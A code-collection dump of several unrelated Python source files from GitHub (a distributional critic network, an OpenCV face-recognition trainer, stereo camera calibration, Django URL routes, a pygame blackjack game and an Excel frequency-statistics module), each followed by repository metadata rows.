nn.Linear(400 + self.act_size, 300),
nn.ReLU(),
nn.Linear(300, self.n_atoms)
)
delta = (self.v_max - self.v_min) / (self.n_atoms - 1)
self.register_buffer("supports", torch.arange(
self.v_min, self.v_max + self.delta, self.delta))
def forward(self, x, a):
obs = self.obs_net(x)
return self.out_net(torch.cat([obs, a], dim=1))
def distr_to_q(self, distr):
weights = F.softmax(distr, dim=1) * self.supports
res = weights.sum(dim=1)
return res.unsqueeze(dim=-1)
| mjadiaz/distributed-ddpg | src/networks.py | networks.py | py | 5,615 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 1... |
73818483305 | import cv2
import numpy as np
from PIL import Image
import os
path = 'dataset'
recogniser = cv2.face.LBPHFaceRecognizer_create()
detector = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
def getImagesAndLabels(path):
imagePaths = [os.path.join(path, f) for f in os.listdir(path)]
#it should be for f in ... maybe
#it joins one or more path components intelligently. So basically an array of paths is created.
#Each path is of type "path/f" where path is defined above and f is in os.listdir(path)
#it returns a string which represents the concatenated path components.
#os.listdir() method in python is used to get the list of all files and directories in the
#specified directory.
#Basically this code stores the paths of all files in the dataset folder in the imagePaths variable
facesamples = []
ids = []
for imagePath in imagePaths:
PIL_img = Image.open(imagePath).convert('L')
#Returns a converted copy of this image
# Syntax: Image.convert(mode=None, matrix=None, dither=None, palette=0, colors=256)
# for grayscale the mode is 'L'
img_numpy = np.array(PIL_img, 'uint8')#converting the image into a numpy array
id = int(os.path.split(imagePath)[-1].split(".")[1])
#os.path.split splits the path into head and tail and returns a list containing these.
#the tail is basically the filename in the path and is the last object in the returned list
#-1 is used to access this last string. now this string is split into multiple strings by
#a delimmiter '.' and then the first element of this list is accessed.
faces = detector.detectMultiScale(img_numpy)
#default scalefactor and minneighbours for this are 1.1 and 3.
for (x, y, w, h) in faces:
facesamples.append(img_numpy[y:y+h, x:x+w])
ids.append(id)
return facesamples, ids
print("\n [INFO] Training faces.....")
faces, ids = getImagesAndLabels(path)
recogniser.train(faces, np.array(ids))
recogniser.write('trainer/trainer.yml')
print("\n [INFO] {0} faces trained.".format(len(np.unique(ids)))) | Ujj013/Face_detector_recogniser | training.py | training.py | py | 2,160 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.face.LBPHFaceRecognizer_create",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "cv2.face",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "cv2.CascadeClassifier",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "o... |
41946408273 | #!/usr/bin/env python
# coding: utf-8
import cv2
import numpy as np
import glob
import os
rows = 6
cols = 9
objp = np.zeros((rows * cols, 3), np.float32)
objp[:, :2] = np.mgrid[0:rows, 0:cols].T.reshape(-1, 2)
# define the path
path = os.getcwd() + '/images/task_1/'
output_path = os.getcwd() + '/output/task_1/'
# 3d point in real world space
obj_left = []
# 2d points in image plane.
img_l = []
images = glob.glob(os.path.join(path, "left_*.png"))
for img_name in images:
img_color = cv2.imread(img_name)
img = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY)
ret, corners = cv2.findChessboardCorners(img, (rows, cols), None)
obj_left.append(objp)
img_l.append(corners)
if ret == True:
corners2 = cv2.cornerSubPix(img, corners, (11,11), (-1,-1), (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_COUNT, 30, 0.01))
cv2.drawChessboardCorners(img_color, (rows, cols), corners2, ret)
cv2.imshow('img', img_color)
cv2.imwrite(output_path + '/corners.png', img_color)
#Calibration
ret, mtx_left, dist, emp, emp = cv2.calibrateCamera(obj_left, img_l, img.shape[::-1], None, None)
# Undistortion for left_2 png
img = cv2.imread(path + "left_2.png")
h, w = img.shape[:2]
new_mtx_left_matrix, roi = cv2.getOptimalNewCameraMatrix(mtx_left, dist, (w,h), 0)
mapx, mapy = cv2.initUndistortRectifyMap(mtx_left, dist, None, new_mtx_left_matrix, (w,h), 5)
dst = cv2.remap(img, mapx, mapy, cv2.INTER_LINEAR)
x, y, w, h = roi
dst = dst[y:y+h, x:x+w]
if dst[0].size > 0:
cv2.imwrite(output_path + '/left_2_undistorted.png', dst)
undistorted_image = cv2.imread(os.path.join(output_path + '/left_2_undistorted.png'))
cv2.imshow('undistorted image', undistorted_image)
param_path = os.getcwd() + '/parameters'
s = cv2.FileStorage('{0}/left_camera_intrinsics.xml'.format(param_path), cv2.FileStorage_WRITE)
s.write('mtx_left', mtx_left)
s.write('distCoeffs_left', dist)
s.release()
# RIght image
rows = 9
cols = 6
objp = np.zeros((rows * cols, 3), np.float32)
objp[:, :2] = np.mgrid[0:rows, 0:cols].T.reshape(-1, 2)
obj_right = [] # 3d point in real world space
img_r = [] # 2d points in image plane.
images = glob.glob(os.path.join(path, "right_*.png"))
for img_name in images:
img_color = cv2.imread(img_name)
img = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY)
ret, corners = cv2.findChessboardCorners(img, (rows, cols), None)
obj_right.append(objp)
img_r.append(corners)
if ret == True:
corners2 = cv2.cornerSubPix(img, corners, (5,5), (-1,-1), (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_COUNT, 30, 0.01))
cv2.drawChessboardCorners(img_color, (rows, cols), corners2, ret)
cv2.imshow('img', img_color)
#Calibration
ret, mtx_right, dist_right, emp, emp = cv2.calibrateCamera(obj_right, img_r, img.shape[::-1], None, None)
img = cv2.imread(path + "right_2.png")
h, w = img.shape[:2]
new_mtx_right_matrix, roi = cv2.getOptimalNewCameraMatrix(mtx_right, dist_right, (w,h), 0)
mapx, mapy = cv2.initUndistortRectifyMap(mtx_right, dist, None, new_mtx_right_matrix, (w,h), 5)
dst = cv2.remap(img, mapx, mapy, cv2.INTER_LINEAR)
x, y, w, h = roi
dst = dst[y:y+h, x:x+w]
if dst[0].size > 0:
cv2.imwrite(output_path + '/right_2_undistorted.png', dst)
undistorted_image = cv2.imread(output_path + '/right_2_undistorted.png')
cv2.imshow('undistorted image', undistorted_image)
s = cv2.FileStorage('{0}/right_camera_intrinsics.xml'.format(param_path), cv2.FileStorage_WRITE)
s.write('mtx_right', mtx_right)
s.write('distCoeffs_right', dist_right)
s.release()
| YB-Joe/Perception_in_Robotics | project_2a/code/task_1/task_1.py | task_1.py | py | 3,567 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "numpy.mgrid",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line... |
30845959188 | __author__ = 'xuxiaoye'
from django.conf.urls import url
from . import views
urlpatterns = [
# Json APIs
url(r'^jsonResult$', views.jsonResult, name='jsonResult'),
url(r'^api\/login$', views.apiLogin, name='apiLogin'),
url(r'^rs$', views.rs, name='rs'),
# End of Json APIs
# Wechat backend
url(r'^weixin$', views.weixin, name='weixin'),
# End of Wechat backend
# Common process
url(r'^back$', views.back, name='back'),
url(r'^logoff$', views.logoff, name='logoff'),
# End of Common process
# Application pages
url(r'^app1\_1$', views.app1_1, name='app1_1'),
url(r'^app1\_2$', views.app1_2, name='app1_2'),
url(r'^app2\_1$', views.app2_1, name='app2_1'),
# End of Application pages
# Ajax
url(r'^ajax$', views.ajax, name='ajax'),
# End of Ajax
# Default home page
url(r'^.*$', views.index, name='index'),
# End of Default home page
]
| xiaoyexu/mysite | xiaoye/urls.py | urls.py | py | 926 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.conf.urls.url",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.conf.urls.url",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.conf.urls.url",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.co... |
12143911661 | import pygame
import Classes_objects
import Developer_help
import Load_image
import Sound_effects
import Check_reasults
import Deck_module
import Speical_moves
#-------------------------------------------------------- load data -----------------------------
#----------------------------------------------------players --------------------------------
player1 = Classes_objects.get_player('PLAYER1')
dealer = Classes_objects.get_player('DEALER')
table = Classes_objects.get_player('TABLE')
#--------------------------------------------------images----------------------
card_back = Load_image.get_game_img('CARD_BACK')
white_chip =Load_image.get_game_img('WHITE_CHIP')
red_chip =Load_image.get_game_img('RED_CHIP')
blue_chip =Load_image.get_game_img('BLUE_CHIP')
green_chip =Load_image.get_game_img('GREEN_CHIP')
black_chip =Load_image.get_game_img('BLACK_CHIP')
#--------------------------------------------------buttons---------------------
back_button = Classes_objects.get_button('BACK')
bet_allin_button = Classes_objects.get_button('ALL_IN')
bet_approve_button = Classes_objects.get_button('APPROVE')
bet_clear_button = Classes_objects.get_button('CLEAR')
split_button = Classes_objects.get_button('SPLIT')
#------------------------------------------------------sound------------------------------------------
button_effect = Sound_effects.get_sound('BUTTON')
chip_effect = Sound_effects.get_sound('CHIP')
def set_bet(win,balance):
'''
#------------------------------------------------------------define the bet at the start of a turn------------------------------------
'''
win.fill((0,150,0))
win.blit(card_back,(350,350))
win.blit(card_back,(450,350))
reset_balance = balance
amount = 0
while True:
back_button.draw(win,(0,0,0))
bet_allin_button.draw(win,(0,0,0))
bet_approve_button.draw(win,(0,0,0))
bet_clear_button.draw(win,(0,0,0))
win.blit(white_chip,(40,350))
win.blit(red_chip,(115,350))
win.blit(blue_chip,(190,350))
win.blit(green_chip,(75,425))
win.blit(black_chip,(150,425))
pygame.draw.rect(win,(100,150,0),(520,40,300,100),0)#to reset the board
Developer_help.write(win,'Balance: {}'.format(balance),30,550,50)
Developer_help.write(win,'bet amount: {}'.format(amount),30,550,100)
pygame.time.delay(50)
pygame.display.update()
for event in pygame.event.get():
pos = pygame.mouse.get_pos()
if event.type == pygame.MOUSEMOTION:
#------------------------------------------------------------chips------------------------------------------------------
if balance >=1:
#WHITE
if pos[0] in range(40,110) and pos[1] in range(350,420):
#HIGHLIGHT THE CHIPS
pygame.draw.circle(win,(0,0,0),(75,385),37)
win.blit(white_chip,(40,350))
else:
pygame.draw.circle(win,(0,150,0),(75,385),37)
win.blit(white_chip,(40,350))
if balance >=5:
#RED
if pos[0] in range(115,185) and pos[1] in range(350,420):
#HIGHLIGHT THE CHIPS
pygame.draw.circle(win,(0,0,0),(150,385),37)
win.blit(red_chip,(115,350))
else:
pygame.draw.circle(win,(0,150,0),(150,385),37)
win.blit(red_chip,(115,350))
if balance >=10:
#BLUE
if pos[0] in range(190,260) and pos[1] in range(350,420):
#HIGHLIGHT THE CHIPS
pygame.draw.circle(win,(0,0,0),(225,385),37)
win.blit(blue_chip,(190,350))
else:
pygame.draw.circle(win,(0,150,0),(225,385),37)
win.blit(blue_chip,(190,350))
if balance >=25:
#GREEN
if pos[0] in range(75,145) and pos[1] in range(425,495):
#HIGHLIGHT THE CHIPS
pygame.draw.circle(win,(0,0,0),(110,460),37)
win.blit(green_chip,(75,425))
else:
pygame.draw.circle(win,(0,150,0),(110,460),37)
win.blit(green_chip,(75,425))
if balance >= 100:
#BLACK
if pos[0] in range(150,220) and pos[1] in range(425,495):
#HIGHLIGHT THE CHIPS
pygame.draw.circle(win,(0,0,0),(185,460),37)
win.blit(black_chip,(150,425))
else:
pygame.draw.circle(win,(0,150,0),(185,460),37)
win.blit(black_chip,(150,425))
#----------------------------------------------------------------------buttons------------------------------------
if back_button.is_over(pos):
back_button.color = (0,0,255)
else:
back_button.color = (255,0,0)
if bet_approve_button.is_over(pos):
bet_approve_button.color = (0,0,255)
else:
bet_approve_button.color = (255,0,0)
if bet_clear_button.is_over(pos):
bet_clear_button.color = (0,0,255)
else:
bet_clear_button.color = (255,0,0)
if bet_allin_button.is_over(pos):
bet_allin_button.color = (0,0,255)
else:
bet_allin_button.color = (255,0,0)
if event.type == pygame.MOUSEBUTTONDOWN:
if back_button.is_over(pos):
button_effect.play()
return 'back'#keyword to signal the outer function game screen
#Buttons for raising the bet
#White
if pos[0] in range(40,110) and pos[1] in range(350,420) and balance >=1:
chip_effect.play()
balance-=1
amount+=1
#Red
if pos[0] in range(115,185) and pos[1] in range(350,420) and balance >=5:
chip_effect.play()
balance-=5
amount+=5
#Blue
if pos[0] in range(190,260) and pos[1] in range(350,420) and balance >=10:
chip_effect.play()
balance-=10
amount+=10
#Green
if pos[0] in range(75,145) and pos[1] in range(425,495) and balance >=25:
chip_effect.play()
balance-=25
amount+=25
#Black
if pos[0] in range(150,220) and pos[1] in range(425,495) and balance >= 100:
chip_effect.play()
balance-=100
amount+=100
if bet_allin_button.is_over(pos):
button_effect.play()
amount += balance
balance = 0
if bet_clear_button.is_over(pos):#clears bet amount and reset balance
button_effect.play()
amount = 0
balance = reset_balance
if bet_approve_button.is_over(pos):
#check bet limit
if amount <2 or amount > 500:
Developer_help.write(win,'Limit is between 2 and 500 $',30,175,100)
else:
button_effect.play()
return amount,balance
if event.type == pygame.QUIT:
return 'quit'
#---------------------------------------------------- player1 turn function -------------------------------------------
def player1_turn(win,player1_card1,player1_card2,at_table,player1_balance,player1_name,player1_bet):
'''
Dictates what a players turn should be like
takes in (card1,card2,amount at table)
'''
#options to bet via function set_bet
#------------------------------------------------------------ LOAD DATA -----------------------
#------------------------------------------------------------ buttons -------------------------
pass_turn_button = Classes_objects.get_button('PASS_TURN')
hit_button = Classes_objects.get_button('HIT')
back_button = Classes_objects.get_button('BACK')
low_ace_button = Classes_objects.get_button('LOW_ACE')
high_ace_button = Classes_objects.get_button('HIGH_ACE')
split_button = Classes_objects.get_button('SPLIT')
double_down_button = Classes_objects.get_button('DOUBLE_DOWN')
#------------------------------------------------------------- sound --------------------------
draw_effect = Sound_effects.get_sound('DRAW')
pass_effect = Sound_effects.get_sound('PASS')
button_effect = Sound_effects.get_sound('BUTTON')
is_double_down = False
is_split = False
is_ace = False
is_natural = True
if player1_card1[0] == 1 or player1_card2[0] == 1 :
is_ace = True
card1_image = pygame.image.load(Load_image.get_card_image(player1_card1))
card2_image = pygame.image.load(Load_image.get_card_image(player1_card2))
card_x = 400
card_y = 200
#in order to view the cards on the screen, get card function imported from load_card_image module allows me to access loaction of image
#without any trouble
win.fill((0,150,0))
draw_effect.play()
win.blit(card1_image,(card_x,card_y))
pygame.display.update()
card_x+=40
card_y+=40
#stored coordinations in a variable in order to allow posting of new cards over the board also
pygame.time.delay(500)
draw_effect.play()
win.blit(card2_image,(card_x,card_y))
pygame.display.update()
#### check if split ###
split = False
if player1_card1[0] == player1_card2[0]:
card1_value = player1_card1[0]
card2_value = player1_card2[0]
is_split = True
#################################turn j,q,k cards to value 10##################
player1_card1 = Developer_help.correct_card_value(player1_card1)
player1_card2 = Developer_help.correct_card_value(player1_card2)
cards_sum = Check_reasults.check_cards_sum(win,is_natural,player1_card1[0],player1_card2[0])
if cards_sum in range(9,12):
is_double_down = True
cards_used = [player1_card1,player1_card2]
while cards_sum < 21:
pass_turn_button.draw(win,(0,0,0))
hit_button.draw(win,(0,0,0))
back_button.draw(win,(0,0,0))
if split is False:
low_ace_button.x = 200
high_ace_button.x = 200
#----------------------------------Turn-------------------------------#
pygame.draw.rect(win,(100,150,0),(470,40,350,100),0)#to reset the board
Developer_help.write(win,"{}'s Balance: {}".format(player1_name,player1_balance),30,500,50)
Developer_help.write(win,'Overall bet amount: {}'.format(at_table),30,500,100)
pygame.time.delay(50)
pygame.display.update()
for event in pygame.event.get():
pos = pygame.mouse.get_pos()
###############################################if mouse moves
if event.type == pygame.MOUSEMOTION:
if back_button.is_over(pos):
back_button.color = (0,0,255)
else:
back_button.color = (255,0,0)
if pass_turn_button.is_over(pos):
pass_turn_button.color = (0,0,255)
else:
pass_turn_button.color = (255,0,0)
if hit_button.is_over(pos):
hit_button.color = (0,0,255)
else:
hit_button.color = (255,0,0)
#---------------------------------- Speical buttons --------------------------
if is_double_down:
double_down_button.draw(win,(0,0,0))
if double_down_button.is_over(pos):
double_down_button.color = (0,0,255)
else:
double_down_button.color = (255,0,0)
if is_split:
split_button.draw(win,(0,0,0))
if split_button.is_over(pos):
split_button.color = (0,0,255)
else:
split_button.color = (255,0,0)
if is_ace:
#show buttons first
low_ace_button.draw(win,(0,0,0))
high_ace_button.draw(win,(0,0,0))
if low_ace_button.is_over(pos):
low_ace_button.color = (0,0,255)
else:
low_ace_button.color = (255,0,0)
if high_ace_button.is_over(pos):
high_ace_button.color = (0,0,255)
else:
high_ace_button.color = (255,0,0)
#####################################################if mouse clicks
if event.type == pygame.MOUSEBUTTONDOWN:
if back_button.is_over(pos):
button_effect.play()
return 'back'
if pass_turn_button.is_over(pos):
if split:
cards_sum = [hand1,cards_sum]
pass_effect.play()
is_split = False
Developer_help.write(win,'Stand',90,200,100)
pygame.display.update()
pygame.time.delay(2000)
return cards_sum
if hit_button.is_over(pos):
draw_effect.play()
if split:
pygame.draw.rect(win,(0,150,0),(40,190,120,275),0)#scrap button
else:
pygame.draw.rect(win,(0,150,0),(190,190,120,275),0)#scrap button
is_split = False
is_natural = False
new_card = Deck_module.pull_card()#pull card
cards_used.append(new_card)
card_x+=40
card_y+=40
#post card image changes cordination so new posting could be shown
new_card_image = pygame.image.load(Load_image.get_card_image(new_card))
win.blit(new_card_image,(card_x,card_y))
pygame.display.update()
pygame.time.delay(1000)
##################change j,q,k values to 10
new_card = Developer_help.correct_card_value(new_card)
if new_card[0] == 1:
is_ace = True
else:
is_ace = False
cards_sum = Check_reasults.check_cards_sum(win,is_natural,new_card[0],cards_sum)
last_card = new_card
if cards_sum is False:
if split:
return hand1
else:
return False
elif cards_sum is True:
return True
#so the function would stop and wont let the game continue
if low_ace_button.is_over(pos):
button_effect.play()
if is_double_down:
pygame.draw.rect(win,(0,150,0),(40,190,120,275),0)#scrap button
is_double_down = False
is_ace = False
if split:
pygame.draw.rect(win,(0,150,0),(40,190,120,275),0)#scrap button
else:
pygame.draw.rect(win,(0,150,0),(190,190,120,275),0)#scrap button
if high_ace_button.is_over(pos):
button_effect.play()
is_ace = False
if is_double_down:
pygame.draw.rect(win,(0,150,0),(40,190,120,275),0)#scrap button
is_double_down = False
if split:
pygame.draw.rect(win,(0,150,0),(40,190,120,275),0)#scrap button
else:
pygame.draw.rect(win,(0,150,0),(190,190,120,275),0)#scrap button
cards_sum = Check_reasults.check_cards_sum(win,is_natural,10,cards_sum)
if cards_sum is True:
return True
elif cards_sum is False:
return False
if is_split is True:
if split_button.is_over(pos):
is_split = False
is_double_down = False
table.win(player1_bet)
player1.bet(player1_bet)
player1_balance = player1.balance
at_table = table.balance
pygame.draw.rect(win,(100,150,0),(470,40,300,100),0)#to reset the board
pygame.draw.rect(win,(0,150,0),(40,190,150,275),0)#scrap button
Developer_help.write(win,"{}'s Balance: {}".format(player1_name,player1_balance),30,500,50)
Developer_help.write(win,'Overall bet amount: {}'.format(at_table),30,500,100)
pygame.display.update()
pygame.time.delay(50)
hand1 = Speical_moves.split(win,(card1_value,player1_card1[1]),(card2_value,player1_card2[1]),player1_name)
if hand1 == 'back':
return 'back'
elif hand1 == 'quit':
return 'quit'
cards_sum = player1_card1[0]
#that a split has happened
split = True
card_x-=40
card_y-=40
if is_double_down and double_down_button.is_over(pos):
if player1_balance >= player1_bet:
is_double_down = False
table.win(player1_bet)
at_table += player1_bet
player1.bet(player1_bet)
player1_balance-= player1_bet
pygame.draw.rect(win,(0,150,0),(40,190,150,275),0)#scrap button
pygame.draw.rect(win,(0,150,0),(190,190,120,275),0)#scrap button
else:
Developer_help.write(win,'There are not enough chips for that',30,150,100)
if event.type == pygame.QUIT:
return 'quit'
#returns 21 if value is equal to 21!
return cards_sum
| DvirS123/Black_Jack_Game | Player_phases.py | Player_phases.py | py | 14,772 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Classes_objects.get_player",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "Classes_objects.get_player",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "Classes_objects.get_player",
"line_number": 16,
"usage_type": "call"
},
{
"... |
506845300 | """
Compile some information from a table
"""
import xlrd
import xlwt
import os
def frequencies_by_place(xls, entities_sheet, entities_id, entities_place,
data_sheet, output, null=None, out_cols_basename=None,
entities_filter=None, cols_exclusion=None):
"""
Entities table:
ID_Aluno | codigo_postal
xxxxxxxx | xxxx-xxx
xxxxxxxx | xxxx-xxx
data_sheet:
ID_Aluno | disciplina_1 | disciplina_2 | disciplina_n
xxxxxxxx | nota_1 | xxxxxxx | xxxxxxx
xxxxxxxx | nota_2 | xxxxxxx | xxxxxxx
xxxxxxxx | nota_3 | xxxxxxx | xxxxxxx
Output tables (one for each disciplina and other for the total)
| nota_1 | nota_2 | nota_3 | Mean | Variance
total | NrAlunos | NrAlunos | NrAlunos | x | y
codigo_postal_1 | NrAlunos | NrAlunos | NrAlunos | x | y
codigo_postal_n | NrAlunos | NrAlunos | NrAlunos | x | y
In the entities_sheet and data_sheet, there must be only one referente
for an entity (duplicated entities are not allowed)
Filtering entities properties is possible
"""
import numpy
from decimal import Decimal
from glass.tbl.xls.fld import get_columns_position
from glass.tbl.xls.summ import list_unique_values_column
from glass.tbl.xls.summ import count_values_column
from glass.tbl.xls.summ import count_values_column_if_entity_exists
from glass.tbl.xls.summ import count_values_column_by_entity_property
"""
Aux method to estimate some generic statistics based on a "Dict Histogram"
(total, mean and standard deviation)
"""
def map_dict(histogram):
if 'mean' in histogram.keys():
del histogram['mean']
if 'stdesviation' in histogram.keys():
del histogram['stdesviation']
if 'total' in histogram.keys():
del histogram['total']
# Get the total of entities
histogram['total'] = sum(histogram.values())
# Get mean
numerator = 0
denominator = 0
std_sample = []
for v in histogram:
if type(v) != str:
numerator += Decimal(v) * Decimal(histogram[v])
denominator += histogram[v]
std_sample += [v for x in range(histogram[v])]
if numerator and denominator:
histogram['mean'] = numerator / Decimal(denominator)
histogram['stdesviation'] = Decimal(numpy.std(std_sample))
return histogram
# Open xls file
__xls_file = xlrd.open_workbook(xls, on_demand=True)
# Map entities with location
"""
d = {
entitie_id : location
}
"""
if entities_filter:
filters = entities_filter.split(';')
filters_map = {}
for flt in filters:
col_filter, val_filter = flt.split('=')
filters_map[col_filter] = val_filter
interest_col = [entities_id, entities_place] + filters_map.keys()
else:
filters_map = 0
interest_col = [entities_id, entities_place]
__entities_sheet = __xls_file.sheet_by_name(entities_sheet)
id_place_position = get_columns_position(
__entities_sheet, interest_col
)
if entities_id not in id_place_position.keys():
raise ValueError('Couldn\'t find the given column id')
elif entities_place not in id_place_position.keys():
raise ValueError('Couldn\'t find the position of the place id')
entities_map = {}
for row in range(1, __entities_sheet.nrows):
__id = __entities_sheet.cell(
row, id_place_position[entities_id]).value
location = __entities_sheet.cell(
row, id_place_position[entities_place]).value
if filters_map:
c = 0
for col_filter in filters_map:
__filter = __entities_sheet.cell(
row, id_place_position[col_filter]).value
if __filter != val_filter:
c += 1
break
if c:
continue
entities_map[__id] = location
# Count Entities by value in each column
"""
d = {
col_1 : {
total : {
total : total_count,
value_1 : value_1_count,
value_2 : value_2_count,
value_n : value_n_count
},
location_1: {
total : total_count,
value_1 : value_1_count,
value_2 : value_2_count,
value_n : value_n_count
},
location_2: {
total : total_count,
value_1 : value_1_count,
value_2 : value_2_count,
value_n : value_n_count
}
},
col_2 : {
total : {
total : total_count,
value_1 : value_1_count,
value_2 : value_2_count,
value_n : value_n_count
},
location_1: {
total : total_count,
value_1 : value_1_count,
value_2 : value_2_count,
value_n : value_n_count
},
location_2: {
total : total_count,
value_1 : value_1_count,
value_2 : value_2_count,
value_n : value_n_count
}
},
col_n : {
...
}
}
"""
data_sheet = __xls_file.sheet_by_name(data_sheet)
data = {}
cols_exclusion = cols_exclusion if type(cols_exclusion) == list else \
[cols_exclusion] if type(cols_exclusion) == str else 0
for col in range(1, data_sheet.ncols):
column_name = data_sheet.cell(0, col).value
if cols_exclusion:
if column_name in cols_exclusion:
continue
# List unique values
values = list_unique_values_column(data_sheet, col)
# Del NoData identifier if defined
if null or null == 0:
if null in values:
values.remove(null)
# Count occourences of a value in that column
val_count = count_values_column_if_entity_exists(
data_sheet, col, entities_map.keys(), values
)
for v in values:
if v not in val_count:
val_count[v] = 0
data[column_name] = {'total' : map_dict(val_count)}
# Do the same for each location
locations = list(set(entities_map.values()))
for place in locations:
val_count = count_values_column_by_entity_property(
data_sheet, col, place, entities_map,
values
)
for v in values:
if v not in val_count:
val_count[v] = 0
data[column_name].update({place : map_dict(val_count)})
"""
Update data dict with one combination of all keys/values data
d.update({
general : {
total : {
total : total_count,
value_1 : value_1_count,
value_2 : value_2_count,
value_n : value_n_count
},
location_1: {
total : total_count,
value_1 : value_1_count,
value_2 : value_2_count,
value_n : value_n_count
},
location_2: {
total : total_count,
value_1 : value_1_count,
value_2 : value_2_count,
value_n : value_n_count
}
}
})
"""
general = {}
for col_sheet in data:
for k in data[col_sheet]:
if k not in general:
general[k] = {}
for _k in data[col_sheet][k]:
general[k][_k] = data[col_sheet][k][_k]
else:
for _k in data[col_sheet][k]:
if _k in general[k]:
general[k][_k] += data[col_sheet][k][_k]
else:
general[k][_k] = data[col_sheet][k][_k]
data['general'] = general
for __dict in data['general']:
with_stats = map_dict(data['general'][__dict])
data['general'][__dict] = with_stats
# Write data in a new xls_file
out_xls = xlwt.Workbook()
for col_sheet in data:
new_sheet = out_xls.add_sheet(col_sheet)
if out_cols_basename:
cols_basename = ['{b}_{_k}'.format(
b=out_cols_basename, _k=str(k)
) for k in data[col_sheet]['total'].keys()]
else:
cols_basename = data[col_sheet]['total'].keys()
cols_name = data[col_sheet]['total'].keys()
cols_basename.sort()
cols_name.sort()
# Write columns names
for c in range(len(cols_name)):
new_sheet.write(0, c+1, cols_basename[c])
# Write lines
lnh = 1
lines_name = data[col_sheet].keys()
lines_name.sort()
for line in lines_name:
# Write line name
new_sheet.write(lnh, 0, line)
# Write counting data
for cln in range(len(cols_name)):
if cols_name[cln] in data[col_sheet][line].keys():
new_sheet.write(
lnh, cln + 1, data[col_sheet][line][cols_name[cln]]
)
lnh += 1
out_xls.save(output)
__xls_file.release_resources()
del __xls_file
def run_freq_by_place_by_sheet(xls, sheets_map, output_fld, null=None,
out_cols_basename=None, entities_filter=None,
cols_exclusion=None):
"""
Execute frequencies_by_place for each group of entities and data sheets
sheets_map should be something like this:
sheets_map = {
'entities_sheet_name' : {
fid : 'entities_field_id_name',
place : 'entities_place_field_name',
data : 'data_sheet_name'
},
...
}
"""
for entity_sheet in sheets_map:
frequencies_by_place(
xls, entity_sheet, sheets_map[entity_sheet]['fid'],
sheets_map[entity_sheet]['place'],
sheets_map[entity_sheet]['data'],
output,
null=null, out_cols_basename=out_cols_basename,
entities_filter=entities_filter,
cols_exclusion=cols_exclusion
)
def frequencies_by_entity_attr(xls, entities_sheet, entities_id, attr_sheet,
interest_values, output, entities_filter=None,
attr_exclusion=None):
"""
Count entities with a number of attributes with a set of specific values
Example:
specific_values = A, S
Entities table:
entity_id | some_data
xxxxxxxx | xxxx-xxx
xxxxxxxx | xxxx-xxx
attributes_sheet:
From tables as:
entity | attr_1 | attr_2 | ... | attr_n
0 | S | S | ... | S
1 | A | B | ... | S
2 | B | B | ... | A
3 | S | A | ... | S
4 | A | S | ... | B
We came to the following result:
values | entities_count | attribute_count
S;A | 2 | 3
S;A | 2 | 2
S;A | 1 | 1
Filtering entities properties is possible... Many could be used...
When many fields are used, the AND operator logic will be applied
E.g of application:
Number of students with a number of negatives
"""
from glass.tbl.xls.fld import get_columns_position
# Open file
__xls = xlrd.open_workbook(xls, on_demand=True)
# Map entities
if entities_filter:
filters = entities_filter.split(';')
filters_map = {}
for flt in filters:
col_filter, val_filter = flt.split('=')
filters_map[col_filter] = val_filter
interest_col = [entities_id] + filters_map.keys()
else:
filters_map = 0
interest_col = entities_id
__entities_sheet = __xls.sheet_by_name(entities_sheet)
cols_position = get_columns_position(__entities_sheet, interest_col)
if entities_id not in cols_position:
raise ValueError('Couldn\'t find the given column id')
entities_map = {}
for row in range(1, __entities_sheet.nrows):
__id = __entities_sheet.cell(row, cols_position[entities_id]).value
if filters_map:
c = 0
for col_filter in filters_map:
__filter = __entities_sheet.cell(
row, cols_position[col_filter]).value
if __filter != filters_map[col_filter]:
c += 1
break
if c:
continue
entities_map[__id] = 0
# Count occurences of the specific/interes values by entitie
data_sheet = __xls.sheet_by_name(attr_sheet)
interest_values = interest_values if type(interest_values) == list else \
[interest_values] if type(interest_values) == str else 0
if not interest_values: raise ValueError(
'interest_values should be a list or string')
for col in range(1, data_sheet.ncols):
column_name = data_sheet.cell(0, col).value
if attr_exclusion and type(attr_exclusion) == list:
if column_name in attr_exclusion:
continue
for row in range(1, data_sheet.nrows):
__id = data_sheet.cell(row, 0).value
value = data_sheet.cell(row, col).value
if value in interest_values:
if __id in entities_map:
entities_map[__id] += 1
# Count the number entities with the same number of occurences of the
# interest/specific values
occurence_count = entities_map.values()
occurence_unique = list(set(occurence_count))
entities_countv = {}
for countv in occurence_unique:
entities_count = occurence_count.count(countv)
entities_countv[entities_count] = countv
# Write output
out_xls = xlwt.Workbook()
new_sheet = out_xls.add_sheet(os.path.splitext(os.path.basename(output))[0])
# colums
c = ['values', 'entities_number', 'values_occurences']
for i in range(len(c)):
new_sheet.write(0, i, c[i])
# values
l = 1
for i in entities_countv:
new_sheet.write(l, 0, ';'.join([str(x) for x in interest_values]))
new_sheet.write(l, 1, i)
new_sheet.write(l, 2, entities_countv[i])
l+=1
out_xls.save(output)
__xls.release_resources()
del __xls
def frequencies_table(xls, data_sheet, output,
entities_sheet=None, entities_id=None,
entities_filter=None, values_filter=None):
"""
